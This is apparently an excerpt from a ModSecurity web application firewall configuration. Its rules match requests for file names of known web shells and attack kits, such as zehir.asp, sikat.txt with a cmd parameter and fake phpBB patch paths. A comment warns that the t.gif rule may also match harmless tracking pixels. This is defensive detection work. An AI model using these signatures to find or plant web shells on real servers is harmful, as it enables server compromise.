# Remaining file-name signatures for known web shells and kits, matched
# against the request line. No rule sets an action, so the configured default
# action applies.
SecFilterSelective THE_REQUEST "/zehir\.asp"
SecFilterSelective THE_REQUEST "/aflast\.txt\?"
SecFilterSelective THE_REQUEST "/sikat\.txt\?&cmd"
# Short name: any t.gif requested with a query string matches, which may
# include legitimate tracking-pixel style URLs.
SecFilterSelective THE_REQUEST "/t\.gif\?"
SecFilterSelective THE_REQUEST "/phpbb_patch\?&"
SecFilterSelective THE_REQUEST "/phpbb2_patch\?&"
SecFilterSelective THE_REQUEST "/lukka\?&"